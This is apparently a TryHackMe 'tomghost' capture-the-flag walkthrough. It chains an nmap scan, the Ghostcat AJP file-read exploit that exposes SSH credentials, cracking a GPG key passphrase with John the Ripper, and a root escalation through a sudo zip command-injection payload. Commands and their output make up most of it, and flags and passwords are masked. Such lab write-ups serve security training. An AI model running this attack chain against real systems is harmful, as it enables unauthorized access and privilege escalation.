5 minutes
THM: tomghost
Title:tomghost
Description:Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.138.247 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 23:45 GMT
Nmap scan report for 10.10.138.247
Host is up (0.020s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.76 seconds
AJP and Tomcat
The interesting things here are Apache JServ Protocol (AJP) is open on port 8009 and the Tomcat versions is indicated as 9.0.30. This means the box is likely vulnerable to CVE-2020-1938, also known as Ghostcat which will allow us to read files. We find an exploit on explolit-db and it reads the WEB-INF/web.xml file getting us a username and password
# python2 48143.py 10.10.138.247
Getting resource at ajp13://10.10.138.247:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">
<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8********************s
</description>
</web-app>
Using those credentials we can login via SSH and get the user flag
# ssh skyfuck@10.10.138.247
The authenticity of host '10.10.138.247 (10.10.138.247)' can't be established.
ED25519 key fingerprint is SHA256:tWlLnZPnvRHCM9xwpxygZKxaf0vJ8/J64v9ApP8dCDo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.138.247' (ED25519) to the list of known hosts.
skyfuck@10.10.138.247's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
skyfuck@ubuntu:~$ ls
credential.pgp tryhackme.asc
skyfuck@ubuntu:~$ ls /home
merlin skyfuck
skyfuck@ubuntu:~$ ls -lah /home/merlin
total 36K
drwxr-xr-x 4 merlin merlin 4.0K Mar 10 2020 .
drwxr-xr-x 4 root root 4.0K Mar 10 2020 ..
-rw------- 1 root root 2.1K Mar 10 2020 .bash_history
-rw-r--r-- 1 merlin merlin 220 Mar 10 2020 .bash_logout
-rw-r--r-- 1 merlin merlin 3.7K Mar 10 2020 .bashrc
drwx------ 2 merlin merlin 4.0K Mar 10 2020 .cache
drwxrwxr-x 2 merlin merlin 4.0K Mar 10 2020 .nano
-rw-r--r-- 1 merlin merlin 655 Mar 10 2020 .profile
-rw-r--r-- 1 merlin merlin 0 Mar 10 2020 .sudo_as_admin_successful
-rw-rw-r-- 1 merlin merlin 26 Mar 10 2020 user.txt
skyfuck@ubuntu:~$ cat /home/merlin/user.txt
THM{G******************y}
Privilege escalation
In the home directory of skyfuck is a encrypted file and key so we will try importing the key and decrypting the file. Unfortunatly the key is password protected
skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg: imported: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp
You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)
gpg: gpg-agent is not available in this session
Enter passphrase:
So we transfer the key to ourselves and crack it with john
# scp skyfuck@10.10.138.247:tryhackme.asc .
skyfuck@10.10.138.247's password:
tryhackme.asc 100% 5144 126.5KB/s 00:00
┌──(root㉿kali)-[~/thm/tomghost]
└─# gpg2john tryhackme.asc > hash
File tryhackme.asc
┌──(root㉿kali)-[~/thm/tomghost]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
a*******u (tryhackme)
1g 0:00:00:00 DONE (2025-03-23 01:37) 12.50g/s 13400p/s 13400c/s 13400C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With the password to the gpg key we can now decrypt the file which gives us the credentials of the other user on the box, merlin
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp
You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)
gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
"tryhackme <stuxnet@tryhackme.com>"
merlin:a*************************************************************j
Using those credentials we can switch to the merlin account. Checking sudo privs we see an entry for zip. A quick check on GTFOBins and we have our escalation path
skyfuck@ubuntu:~$ su - merlin
Password:
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{Z*********E}